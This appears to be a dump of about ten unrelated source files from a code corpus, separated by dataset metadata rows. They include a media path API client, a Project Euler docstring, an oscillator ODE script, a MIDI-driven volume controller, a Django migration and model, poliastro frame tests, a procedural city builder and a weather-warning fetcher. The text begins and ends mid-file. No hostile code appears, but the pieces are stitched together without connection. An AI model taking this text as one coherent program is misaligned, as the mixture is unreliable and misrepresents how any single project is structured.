allPaths = cls._getPaths(getMovies=getMovies)
localPaths = cls._getLocalPaths(getMovies=getMovies)
for path in localPaths:
allPaths.setdefault(path, set()).add(-1)
return allPaths
@classmethod
def getAllTVPaths(cls):
return cls._getAllPaths(getMovies=False)
@classmethod
def getAllMoviePaths(cls):
return cls._getAllPaths(getMovies=True)
@classmethod
def _getPathByLocalPathAndRemotePath(cls,
localpath,
remotepath,
useMovieURL=False,
):
payload = {'localpath': localpath, 'remotepath': remotepath}
if useMovieURL:
url = MEDIAVIEWER_MOVIE_PATH_URL
else:
url = MEDIAVIEWER_TV_PATH_URL
request = requests.get(url,
params=payload,
verify=VERIFY_REQUESTS,
auth=(WAITER_USERNAME, WAITER_PASSWORD),
)
request.raise_for_status()
data = request.json()
return data
@classmethod
def getTVPathByLocalPathAndRemotePath(cls, localpath, remotepath):
return cls._getPathByLocalPathAndRemotePath(localpath,
remotepath,
useMovieURL=False)
@classmethod
def getMoviePathByLocalPathAndRemotePath(cls, localpath, remotepath):
return cls._getPathByLocalPathAndRemotePath(localpath,
remotepath,
useMovieURL=True)
| mit | -5,957,461,500,576,863,000 | 31.449664 | 113 | 0.53878 | false | 4.448022 | false | false | false |
openqt/algorithms | projecteuler/pe434-rigid-graphs.py | 1 | 1605 | #!/usr/bin/env python
# coding=utf-8
"""434. Rigid graphs
https://projecteuler.net/problem=434
Recall that a graph is a collection of vertices and edges connecting the
vertices, and that two vertices connected by an edge are called adjacent.
Graphs can be embedded in Euclidean space by associating each vertex with a
point in the Euclidean space.
A **flexible** graph is an embedding of a graph where it is possible to move
one or more vertices continuously so that the distance between at least two
nonadjacent vertices is altered while the distances between each pair of
adjacent vertices is kept constant.
A **rigid** graph is an embedding of a graph which is not flexible.
Informally, a graph is rigid if by replacing the vertices with fully rotating
hinges and the edges with rods that are unbending and inelastic, no parts of
the graph can be moved independently from the rest of the graph.
The **grid graphs** embedded in the Euclidean plane are not rigid, as the
following animation demonstrates:
However, one can make them rigid by adding diagonal edges to the cells. For
example, for the 2x3 grid graph, there are 19 ways to make the graph rigid:
Note that for the purposes of this problem, we do not consider changing the
orientation of a diagonal edge or adding both diagonal edges to a cell as a
different way of making a grid graph rigid.
Let R(m,n) be the number of ways to make the m × n grid graph rigid.
E.g. R(2,3) = 19 and R(5,5) = 23679901
Define S(N) as ∑R(i,j) for 1 ≤ i, j ≤ N.
E.g. S(5) = 25021721.
Find S(100), give your answer modulo 1000000033
"""
| gpl-3.0 | 7,233,314,266,194,622,000 | 43.388889 | 77 | 0.761577 | false | 3.535398 | false | false | false |
sideshownick/Snaking_Networks | Illogic/run_solve.py | 1 | 1827 | from pylab import *
from scipy import sparse
from scipy.integrate import odeint
import os, time
from osc_eqn import osc2
from my_parameters import *
detune=0.001
alpha0=3.08
alpha1=1e-3*random(Nosc)+alpha0
alpha1=1.0/(alpha1)
length1=length*stepsize+1
tlength=translength*stepsize+1
S1=zeros((Nosc,Nosc))
S1[0,5]=S1[1,4]=S1[2,3]=0.8
S1[3,0]=S1[3,1]=S1[4,0]=S1[4,2]=S1[5,1]=S1[5,2]=0.4
#for i in range(0,Nosc-1):
# S1[i,i+1]=0.2
#S1[Nosc-1,0]=0.8
print S1
S=sparse.csr_matrix(S1)
#ic1=[]
#for line in file('fc0.txt'):
# ic1.append(double(line))
for coupling in [0.11]:#arange(0.11,0.115,0.001): #[0.09]:
try: os.mkdir('Data')
except: pass
#arange(3.535,3.55,0.001):
for beta in [3.5]:
beta1=1e-3*random(Nosc)+beta
beta1=1.0/(beta1)
outname='a%2.3f_b%2.3f_c%2.3f'%(alpha0,beta,coupling)
print 'running params %s'%outname
#set initial conditions
#x=ic1
x=[]
for n in range(0, Nosc):
x.append(0.01*rand()+(-1)**(n+1)*3)
for n in range(0, Nosc):
x.append((-1)**(n+1)*0.3)
for n in range(0, Nosc):
x.append((-1)**(n+1)*1.0)
x=array(x)
time0=time.time()
##transient
timepoints = arange(1., tlength, stepsize)
transient = odeint(osc2, x, timepoints, args=(alpha1, beta1, coupling, S))
tran3=reshape(transient,(translength,Nosc*3))
savetxt('data_transient.txt',tran3)
x=transient[-1,:]
time1=time.time()
timepoints = arange(1., length1, stepsize)
trajectory = odeint(osc2, x, timepoints, args=(alpha1, beta1, coupling, S))
time2=time.time()
x=trajectory[-1,:]
print "Solved in %e seconds (%e transient + %e printed)" % (time2-time0,time1-time0,time2-time1)
plot(trajectory[:,0])
savefig('traj.png')
savetxt('fc.txt',trajectory[-1,:])
traj3=reshape(trajectory,(length,Nosc*3))
savetxt('data_trajectory.txt',traj3)
#end
| gpl-2.0 | 2,475,075,068,369,918,500 | 21.280488 | 100 | 0.648057 | false | 2.211864 | false | false | false |
psylo8/midivol | midivol_win.py | 1 | 7621 | import sys
import time
from subprocess import call
import pygame.midi
class NircmdMixer():
"""
    Set the system master volume via nircmd; raw volume values are in [0, 65535].
"""
def __init__(self):
self.current_volume = 0
def volume_to_int(self, volume):
"""
Convert 0-100 volume value to [0, 65535] range
"""
result = 0
try:
result = int(65535 * volume / 100)
except Exception:
pass
return result
def setvolume(self, vol, verbose=False):
if vol != self.current_volume:
volume = self.volume_to_int(vol)
call(["nircmd", "setsysvolume", str(volume)])
self.current_volume = vol
if verbose:
print 'Midivol: Volume set to {}'.format(self.current_volume)
# print str(volume)
class Midivol():
'''
Class used to control master volume mixer (using nircmd) from midi input (pygame.midi) on windows systems
'''
system_mixer = NircmdMixer()
tag ='Midivol: '
def __init__(self, device='', max_volume=50, channel=None, control=None, verbose=False):
self.device = device
self.max_volume = max_volume
self.channel = channel
self.control = control
self.verbose = verbose
self.inputs = pygame.midi
self.inputs.init()
self.devices = self.get_device_list()
self.stop_listening = False
def build(self):
'''
Finalize midivol and run main listening loop
'''
if not self.device:
if self.inputs.get_count() == 0:
raise Exception('No available MIDI devices')
else:
for d in self.devices:
if d[2] == 1: #input
self.device = self.devices.index(d)
break
else:
try:
self.device = int(self.device)
except ValueError:
raise Exception("Incorrect device parameter")
if self.device < len(self.devices):
# list of gates functions attribute to determine
# if msg should be passed (processed volume change)
self.funky_list = []
if self.channel != None:
self.funky_list.append(self.channel_gates)
if self.control != None:
self.funky_list.append(self.control_gates)
self.listening_input = self.inputs.Input(self.device, 0)
self.log_msg('Running using MIDI device: {}, max_vol: {}, filters: channel {} control {}'.format(
self.devices[self.device][1], self.max_volume, self.channel, self.control))
else:
raise Exception('"{}" input device not found'.format(self.device))
def run(self):
# main loop for MIDI msg listening
while True:
if self.listening_input.poll():
msg = self.listening_input.read(1)
self.set_volume_from_midi_msg(msg)
if self.verbose:
self.log_msg(msg)
time.sleep(0.005)
def assign_device_by_name(self,name):
for dev in xrange(0, self.inputs.get_count()):
dev_info = self.inputs.get_device_info(dev)
if name == dev_info[1] and dev_info[2] == 1:
self.device = dev
return True
# devices.append(self.inputs.get_device_info(dev))
return False
def get_device_list(self):
devices = []
for dev in xrange(0, self.inputs.get_count()):
devices.append(self.inputs.get_device_info(dev))
return devices
def set_volume(self, val): #dev
'''
Sets volume of self.system_mixer
'''
if val > self.max_volume:
val = self.max_volume
self.system_mixer.setvolume(val)
def channel_gates(self, msg):
'''
Msg passes gates if channel is as needed
'''
return self.channel == msg[0][0][0]
def control_gates(self, msg):
'''
Msg passes gates if control id is as needed
'''
return self.control == msg[0][0][1]
def set_volume_from_midi_msg(self, msg):
'''
Set volume for main mixer from mido midi msg object
'''
for funk in self.funky_list:
if not funk(msg):
return
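        # pygame.midi read() events look like [[[status, data1, data2, data3], timestamp]];
        # msg[0][0][2] (data2) is the 0-127 controller value.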
val = self.midi_to_volume(msg[0][0][2])
self.set_volume(val)
def log_msg(self, msg):
'''
Log msg with tag to console
'''
print '{} {}'.format(self.tag, str(msg))
def midi_to_volume(self, value):
'''
Convert midi 0-127 values to 0-99 volume values
'''
volume = 0
try:
volume = int(value // 1.28)
except Exception:
print Exception
return volume
def assign_param(argv, param_name, param_value, convert_to_int=False):
'''
    Return the value that follows param_name in argv; if param_name is not found,
    return param_value unchanged. Convert the result to int if convert_to_int is True.
'''
idx = None
try:
idx = argv.index(param_name)
except ValueError:
return param_value
try:
param_value = argv[idx + 1]
if convert_to_int:
try:
param_value = int(param_value)
except ValueError:
pass
except IndexError:
pass
return param_value
def display_help():
'''
Displays help info in the console for -h parameter
'''
help_content = []
help_content.append('----------------------------------------------\n')
help_content.append('Control system volume tool using MIDI messages\n')
help_content.append(' Available parameters:\n')
help_content.append(' -h Display help info\n')
help_content.append(' -d MIDI device name or id (default first available MIDI device)\n')
help_content.append(' Can be integer value, which means # of available midi devices\n')
help_content.append(' -l Returns list of all available MIDI devices\n')
help_content.append(' -ch MIDI channel listen to 0-15 (default all)\n')
help_content.append(' -ct MIDI control id to process, type int (default all ids)\n')
help_content.append(' -m Max volume threshold 0-99 (default 30)\n')
help_content.append(' -v Run in verbose mode\n')
print ''.join(help_content)
quit()
def display_devices():
'''
Displays all available MIDI devices seen by mido
'''
midi = pygame.midi
midi.init()
print 'List of available MIDI devices:'
print '(interf, name, input, output, opened)'
for dev in xrange(0, midi.get_count()):
print midi.get_device_info(dev)
quit()
def assign_params(midivol):
'''
Assign sys.argv params to midivol atrrbutes
'''
help_par = '-h'
device_par = '-d'
list_par = '-l'
channel_par = '-ch'
control_par = '-ct'
maxvolume_par = '-m'
verbose_par = '-v'
if help_par in sys.argv:
display_help()
if list_par in sys.argv:
display_devices()
midivol.device = assign_param(sys.argv, device_par, midivol.device)
midivol.channel = assign_param(sys.argv, channel_par, midivol.channel, True)
midivol.control = assign_param(sys.argv, control_par, midivol.control, True)
midivol.max_volume = assign_param(sys.argv, maxvolume_par, midivol.max_volume, True)
if verbose_par in sys.argv:
midivol.verbose = True
def main():
'''
Main method
'''
midivol = Midivol()
assign_params(midivol)
midivol.build()
midivol.run()
if __name__ == "__main__":
main()
| gpl-3.0 | 174,499,710,867,700,300 | 30.237705 | 109 | 0.566855 | false | 3.723009 | false | false | false |
arunchaganty/contextual-comparatives | bin/summarize_evaluation.py | 1 | 1664 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division
import csv
import sys
from collections import Counter
def do_command(args):
reader = csv.reader(args.input, delimiter="\t")
writer = csv.writer(args.output, delimiter="\t")
header = next(reader)
assert header == "id baseline_perspective generation_perspective baseline_votes generation_votes none_votes n_votes error_analysis".split(), "invalid header: " + header
counter = Counter()
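    # Tally a 2x2 contingency table keyed by (baseline rated useful, generation rated useful).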
for id, baseline_perspective, generation_perspective, baseline_votes, generation_votes, none_votes, n_votes, error_analysis in reader:
#if generation_perspective == "": continue
baseline_wins = int(baseline_votes) >= int(n_votes)/2
generation_wins = int(generation_votes) >= int(n_votes)/2
counter[baseline_wins, generation_wins] += 1
writer.writerow(["baseline perspective is rated useful", "generation perspective is rated useful", "# Mentions"])
for truth in [True, False]:
for truth_ in [True, False]:
writer.writerow([truth, truth_, counter[truth, truth_]])
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser( description='' )
parser.add_argument('--input', type=argparse.FileType('r'), default=sys.stdin, help="")
parser.add_argument('--output', type=argparse.FileType('w'), default=sys.stdout, help="")
parser.set_defaults(func=do_command)
#subparsers = parser.add_subparsers()
#command_parser = subparsers.add_parser('command', help='' )
#command_parser.set_defaults(func=do_command)
ARGS = parser.parse_args()
ARGS.func(ARGS)
| mit | -4,559,597,711,908,071,400 | 37.697674 | 172 | 0.676082 | false | 3.681416 | false | false | false |
pkimber/compose | compose/migrations/0018_auto_20170418_1445.py | 1 | 5784 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-18 13:45
from __future__ import unicode_literals
import block.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('block', '0018_image_user'),
('compose', '0017_auto_20160205_1752'),
]
operations = [
migrations.CreateModel(
name='Calendar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('date_moderated', models.DateTimeField(blank=True, null=True)),
('order', models.IntegerField()),
],
options={
'verbose_name_plural': 'Calendar',
'verbose_name': 'Calendar',
},
),
migrations.CreateModel(
name='CalendarBlock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('page_section', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='block.PageSection')),
],
options={
'verbose_name_plural': 'Blocks',
'abstract': False,
'verbose_name': 'Block',
},
),
migrations.CreateModel(
name='Map',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('date_moderated', models.DateTimeField(blank=True, null=True)),
('order', models.IntegerField()),
],
options={
'verbose_name_plural': 'Map',
'verbose_name': 'Map',
},
),
migrations.CreateModel(
name='MapBlock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('page_section', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='block.PageSection')),
],
options={
'verbose_name_plural': 'Blocks',
'abstract': False,
'verbose_name': 'Block',
},
),
migrations.AddField(
model_name='map',
name='block',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content', to='compose.MapBlock'),
),
migrations.AddField(
model_name='map',
name='edit_state',
field=models.ForeignKey(default=block.models._default_edit_state, on_delete=django.db.models.deletion.CASCADE, to='block.EditState'),
),
migrations.AddField(
model_name='map',
name='map',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='map', to='block.Link'),
),
migrations.AddField(
model_name='map',
name='moderate_state',
field=models.ForeignKey(default=block.models._default_moderate_state, on_delete=django.db.models.deletion.CASCADE, to='block.ModerateState'),
),
migrations.AddField(
model_name='map',
name='user_moderated',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='calendar',
name='block',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content', to='compose.CalendarBlock'),
),
migrations.AddField(
model_name='calendar',
name='calendar',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='calendar', to='block.Link'),
),
migrations.AddField(
model_name='calendar',
name='edit_state',
field=models.ForeignKey(default=block.models._default_edit_state, on_delete=django.db.models.deletion.CASCADE, to='block.EditState'),
),
migrations.AddField(
model_name='calendar',
name='moderate_state',
field=models.ForeignKey(default=block.models._default_moderate_state, on_delete=django.db.models.deletion.CASCADE, to='block.ModerateState'),
),
migrations.AddField(
model_name='calendar',
name='user_moderated',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='map',
unique_together=set([('block', 'moderate_state')]),
),
migrations.AlterUniqueTogether(
name='calendar',
unique_together=set([('block', 'moderate_state')]),
),
]
| apache-2.0 | -700,877,570,277,012,400 | 42.164179 | 153 | 0.56639 | false | 4.326103 | false | false | false |
Juanlu001/poliastro | tests/test_frames.py | 1 | 7645 | import numpy as np
import pytest
from astropy import units as u
from astropy.coordinates import (
CartesianRepresentation,
get_body_barycentric,
solar_system_ephemeris,
)
from astropy.tests.helper import assert_quantity_allclose
from astropy.time import Time
from poliastro.bodies import (
Earth,
Jupiter,
Mars,
Mercury,
Neptune,
Saturn,
Sun,
Uranus,
Venus,
)
from poliastro.constants import J2000
from poliastro.frames.ecliptic import GeocentricSolarEcliptic
from poliastro.frames.equatorial import (
GCRS,
HCRS,
ICRS,
JupiterICRS,
MarsICRS,
MercuryICRS,
NeptuneICRS,
SaturnICRS,
UranusICRS,
VenusICRS,
)
from poliastro.frames.fixed import (
ITRS,
JupiterFixed,
MarsFixed,
MercuryFixed,
NeptuneFixed,
SaturnFixed,
SunFixed,
UranusFixed,
VenusFixed,
)
@pytest.mark.parametrize(
"body, frame",
[
(Mercury, MercuryICRS),
(Venus, VenusICRS),
(Mars, MarsICRS),
(Jupiter, JupiterICRS),
(Saturn, SaturnICRS),
(Uranus, UranusICRS),
(Neptune, NeptuneICRS),
],
)
def test_planetary_frames_have_proper_string_representations(body, frame):
coords = frame()
assert body.name in repr(coords)
@pytest.mark.parametrize(
"body, frame",
[
(Sun, HCRS),
(Mercury, MercuryICRS),
(Venus, VenusICRS),
(Earth, GCRS),
(Mars, MarsICRS),
(Jupiter, JupiterICRS),
(Saturn, SaturnICRS),
(Uranus, UranusICRS),
(Neptune, NeptuneICRS),
],
)
def test_planetary_icrs_frame_is_just_translation(body, frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
vector = CartesianRepresentation(x=100 * u.km, y=100 * u.km, z=100 * u.km)
vector_result = (
frame(vector, obstime=epoch)
.transform_to(ICRS)
.represent_as(CartesianRepresentation)
)
expected_result = get_body_barycentric(body.name, epoch) + vector
assert_quantity_allclose(vector_result.xyz, expected_result.xyz)
@pytest.mark.parametrize(
"body, frame",
[
(Sun, HCRS),
(Mercury, MercuryICRS),
(Venus, VenusICRS),
(Earth, GCRS),
(Mars, MarsICRS),
(Jupiter, JupiterICRS),
(Saturn, SaturnICRS),
(Uranus, UranusICRS),
(Neptune, NeptuneICRS),
],
)
def test_icrs_body_position_to_planetary_frame_yields_zeros(body, frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
vector = get_body_barycentric(body.name, epoch)
vector_result = (
ICRS(vector)
.transform_to(frame(obstime=epoch))
.represent_as(CartesianRepresentation)
)
assert_quantity_allclose(vector_result.xyz, [0, 0, 0] * u.km, atol=1e-7 * u.km)
@pytest.mark.parametrize(
"body, fixed_frame, inertial_frame",
[
(Sun, SunFixed, HCRS),
(Mercury, MercuryFixed, MercuryICRS),
(Venus, VenusFixed, VenusICRS),
(Earth, ITRS, GCRS),
(Mars, MarsFixed, MarsICRS),
(Jupiter, JupiterFixed, JupiterICRS),
(Saturn, SaturnFixed, SaturnICRS),
(Uranus, UranusFixed, UranusICRS),
(Neptune, NeptuneFixed, NeptuneICRS),
],
)
def test_planetary_fixed_inertial_conversion(body, fixed_frame, inertial_frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
fixed_position = fixed_frame(
0 * u.deg, 0 * u.deg, body.R, obstime=epoch, representation_type="spherical"
)
inertial_position = fixed_position.transform_to(inertial_frame(obstime=epoch))
assert_quantity_allclose(
fixed_position.spherical.distance, body.R, atol=1e-7 * u.km
)
assert_quantity_allclose(
inertial_position.spherical.distance, body.R, atol=1e-7 * u.km
)
@pytest.mark.parametrize(
"body, fixed_frame, inertial_frame",
[
(Sun, SunFixed, HCRS),
(Mercury, MercuryFixed, MercuryICRS),
(Venus, VenusFixed, VenusICRS),
(Earth, ITRS, GCRS),
(Mars, MarsFixed, MarsICRS),
(Jupiter, JupiterFixed, JupiterICRS),
(Saturn, SaturnFixed, SaturnICRS),
(Uranus, UranusFixed, UranusICRS),
(Neptune, NeptuneFixed, NeptuneICRS),
],
)
def test_planetary_inertial_fixed_conversion(body, fixed_frame, inertial_frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
inertial_position = inertial_frame(
0 * u.deg, 0 * u.deg, body.R, obstime=epoch, representation_type="spherical"
)
fixed_position = inertial_position.transform_to(fixed_frame(obstime=epoch))
assert_quantity_allclose(
fixed_position.spherical.distance, body.R, atol=1e-7 * u.km
)
assert_quantity_allclose(
inertial_position.spherical.distance, body.R, atol=1e-7 * u.km
)
@pytest.mark.parametrize(
"body, fixed_frame, inertial_frame",
[
(Sun, SunFixed, HCRS),
(Mercury, MercuryFixed, MercuryICRS),
(Venus, VenusFixed, VenusICRS),
(Earth, ITRS, GCRS),
(Mars, MarsFixed, MarsICRS),
(Jupiter, JupiterFixed, JupiterICRS),
(Saturn, SaturnFixed, SaturnICRS),
(Uranus, UranusFixed, UranusICRS),
(Neptune, NeptuneFixed, NeptuneICRS),
],
)
def test_planetary_inertial_roundtrip_vector(body, fixed_frame, inertial_frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
sampling_time = 10 * u.s
fixed_position = fixed_frame(
np.broadcast_to(0 * u.deg, (1000,), subok=True),
np.broadcast_to(0 * u.deg, (1000,), subok=True),
np.broadcast_to(body.R, (1000,), subok=True),
representation_type="spherical",
obstime=epoch + np.arange(1000) * sampling_time,
)
inertial_position = fixed_position.transform_to(
inertial_frame(obstime=epoch + np.arange(1000) * sampling_time)
)
fixed_position_roundtrip = inertial_position.transform_to(
fixed_frame(obstime=epoch + np.arange(1000) * sampling_time)
)
assert_quantity_allclose(
fixed_position.cartesian.xyz,
fixed_position_roundtrip.cartesian.xyz,
atol=1e-7 * u.km,
)
def test_round_trip_from_GeocentricSolarEcliptic_gives_same_results():
gcrs = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
gse = gcrs.transform_to(GeocentricSolarEcliptic(obstime=Time("J2000")))
gcrs_back = gse.transform_to(GCRS(obstime=Time("J2000")))
assert_quantity_allclose(gcrs_back.dec.value, gcrs.dec.value, atol=1e-7)
assert_quantity_allclose(gcrs_back.ra.value, gcrs.ra.value, atol=1e-7)
def test_GeocentricSolarEcliptic_against_data():
gcrs = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
gse = gcrs.transform_to(GeocentricSolarEcliptic(obstime=J2000))
lon = 233.11691362602866
lat = 48.64606410986667
assert_quantity_allclose(gse.lat.value, lat, atol=1e-7)
assert_quantity_allclose(gse.lon.value, lon, atol=1e-7)
def test_GeocentricSolarEcliptic_raises_error_nonscalar_obstime():
with pytest.raises(ValueError) as excinfo:
gcrs = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
gcrs.transform_to(GeocentricSolarEcliptic(obstime=Time(["J3200", "J2000"])))
assert (
"To perform this transformation the "
"obstime Attribute must be a scalar." in str(excinfo.value)
)
| mit | -3,125,264,317,094,795,300 | 30.204082 | 88 | 0.628646 | false | 2.960883 | true | false | false |
aucor/servo | servo/models/device.py | 1 | 2057 | #coding=utf-8
from django.db import models
from django.dispatch import receiver
from django.utils.translation import ugettext as _
from django.db.models.signals import pre_save, post_save
import gsx
from servo.models.common import Tag, Attachment
class Device(models.Model):
sn = models.CharField(max_length=32, blank=True,
verbose_name=_(u'sarjanumero'))
description = models.CharField(max_length=128, default=_('Uusi laite'),
verbose_name=_(u'kuvaus'))
username = models.CharField(max_length=32, blank=True, null=True,
verbose_name=_(u'käyttäjätunnus'))
password = models.CharField(max_length=32, blank=True, null=True,
verbose_name=_(u'salasana'))
purchased_on = models.DateField(blank=True, null=True,
verbose_name=_(u'hankittu'))
notes = models.TextField(blank=True, null=True,
verbose_name=_(u'merkinnät'))
tags = models.ManyToManyField(Tag, null=True, blank=True,
verbose_name=_(u'tagit'))
files = models.ManyToManyField(Attachment)
@classmethod
def from_gsx(cls, sn):
"""
Search GSX and initialize a new Device with the results
"""
dev = gsx.Product(sn).get_warranty()
device = Device(sn=dev.serialNumber,
description=dev.productDescription,
purchased_on=dev.estimatedPurchaseDate)
device.save()
return device
def get_absolute_url(self):
return "/devices/%d/view/" % self.pk
def spec_id(self):
return self.tags.all()[0].id
def __unicode__(self):
return '%s (%s)' %(self.description, self.sn)
class Meta:
app_label = 'servo'
@receiver(post_save, sender=Device)
def create_spec(sender, instance, created, **kwargs):
# make sure we have this spec
if created:
(tag, created) = Tag.objects.get_or_create(title=instance.description,
type='device')
instance.tags.add(tag)
instance.save()
| bsd-2-clause | 1,277,555,999,983,982,600 | 33.216667 | 79 | 0.622017 | false | 3.739526 | false | false | false |
ekumenlabs/terminus | terminus/builders/simple_city_builder.py | 1 | 7417 | """
Copyright (C) 2017 Open Source Robotics Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from geometry.point import Point
from models.city import City
from models.street import Street
from models.trunk import Trunk
from models.block import Block
from models.building import Building
from models.ground_plane import GroundPlane
from models.road import *
from builders.abstract_city_builder import AbstractCityBuilder
class SimpleCityBuilder(AbstractCityBuilder):
def _buid_city(self):
# Must be odd
size = 5
city = City("Simple City")
self.multiplier = 100
self._create_ground_plane(city, size)
self._setup_intersections(city, size)
self._create_inner_streets(city, size)
self._create_surrounding_ring_road(city, size)
# Disabling this temporarily as we are focusing on road networks
# self._create_blocks(city, size)
# self._create_buildings(city, size)
return city
def _setup_intersections(self, city, size):
self.intersections = [[Point(self.multiplier * x, self.multiplier * y, 0)
for y in range(size)] for x in range(size)]
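        # Nudge the border intersections outward by 2 units so the surrounding
        # ring road sits just outside the inner street grid.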
for x in range(size - 1):
self.intersections[x][0] = self.intersections[x][0] + Point(0, -2)
self.intersections[size - 1][0] = self.intersections[size - 1][0] + Point(2, -2)
for y in range(1, size):
self.intersections[size - 1][y] = self.intersections[size - 1][y] + Point(2, 0)
for x in range(size - 1):
self.intersections[size - x - 1][size - 1] = self.intersections[size - x - 1][size - 1] + Point(0, 2)
self.intersections[0][size - 1] = self.intersections[0][size - 1] + Point(-2, 2)
for y in range(1, size):
self.intersections[0][size - y - 1] = self.intersections[0][size - y - 1] + Point(-2, 0)
for x in range(size):
for y in range(size):
city.add_intersection_at(self.intersections[x][y])
def _create_ground_plane(self, city, size):
ground_plane_size = size * self.multiplier
ground_plane = GroundPlane(ground_plane_size,
Point(ground_plane_size / 2,
ground_plane_size / 2,
0),
'ground_plane')
city.set_ground_plane(ground_plane)
def _create_inner_streets(self, city, size):
# Vertical
for x in range(1, size - 1):
road = Street()
for y in range(size):
road.add_control_point(self.intersections[x][y])
city.add_road(road)
# Horizontal
for y in range(1, size - 1):
road = Street()
for x in range(size):
road.add_control_point(self.intersections[x][y])
city.add_road(road)
# Diagonals
road = Street()
for i in range(size):
road.add_control_point(self.intersections[i][i])
city.add_road(road)
road = Street()
for i in range(size):
road.add_control_point(self.intersections[i][size - i - 1])
city.add_road(road)
def _create_surrounding_ring_road(self, city, size):
ring_road_1 = Trunk(name='RingRoad1')
for x in range(size):
ring_road_1.add_control_point(self.intersections[x][0])
city.add_road(ring_road_1)
ring_road_2 = Trunk(name='RingRoad2')
for y in range(size):
ring_road_2.add_control_point(self.intersections[size - 1][y])
city.add_road(ring_road_2)
ring_road_3 = Trunk(name='RingRoad3')
for x in range(size):
ring_road_3.add_control_point(self.intersections[size - x - 1][size - 1])
city.add_road(ring_road_3)
ring_road_4 = Trunk(name='RingRoad4')
for y in range(size):
ring_road_4.add_control_point(self.intersections[0][size - y - 1])
city.add_road(ring_road_4)
def _create_blocks(self, city, size):
blocks_count = size - 1
block_size = 96
inital_offset = 50
street_width = 4
half_street_width = street_width / 2.0
triangle_delta = 93
for x in range(blocks_count):
for y in range(blocks_count):
if x == y:
origin = Point(street_width + 1 + x * self.multiplier,
half_street_width + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(triangle_delta, 0, 0), Point(triangle_delta, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
origin = Point(half_street_width + x * self.multiplier,
street_width + 1 + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(0, triangle_delta, 0), Point(triangle_delta, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
elif x + y == blocks_count - 1:
origin = Point(half_street_width + x * self.multiplier,
half_street_width + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(triangle_delta, 0, 0), Point(0, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
origin = Point((x + 1) * self.multiplier - half_street_width,
street_width + 1 + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(0, triangle_delta, 0), Point(-triangle_delta, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
else:
origin = Point(inital_offset + x * self.multiplier,
inital_offset + y * self.multiplier, 0)
block = Block.square(origin, block_size)
city.add_block(block)
def _create_buildings(self, city, size):
blocks_count = size - 1
building_spacing = 18
for x in range(blocks_count):
for y in range(blocks_count):
for block_x in range(3):
for block_y in range(3):
pos = Point(x * self.multiplier + block_x * 30 + building_spacing,
y * self.multiplier + block_y * 30 + building_spacing, 0)
if abs(pos.y - pos.x) > building_spacing and \
abs(pos.y + pos.x - self.multiplier * blocks_count) > building_spacing:
building = Building.square(pos, 20, 40)
city.add_building(building)
| apache-2.0 | 3,878,573,317,858,789,000 | 40.668539 | 119 | 0.55184 | false | 3.859001 | false | false | false |
nhho/hko | hko/weather_warning.py | 2 | 1053 | """A module to retrieve weather warning data from Hong Kong Observatory"""
import json
import requests
BASE_URL = 'http://www.weather.gov.hk/'
URL_UC = 'wxinfo/json/warnsumc.xml'
URL_EN = 'wxinfo/json/warnsum.xml'
def weather_warning(lang='UC'):
"""A function to retrieve weather warning data from Hong Kong Observatory"""
response = {}
if lang in ['UC', 'EN']:
try:
if lang == 'UC':
data = requests.get(BASE_URL + URL_UC)
if lang == 'EN':
data = requests.get(BASE_URL + URL_EN)
data_2 = json.loads(data.text.replace('var weather_warning_summary = ', '')[:-2] + '}')
response['result'] = data_2
response['status'] = 1
except IndexError:
response['result'] = ''
response['status'] = 2
except requests.exceptions.RequestException:
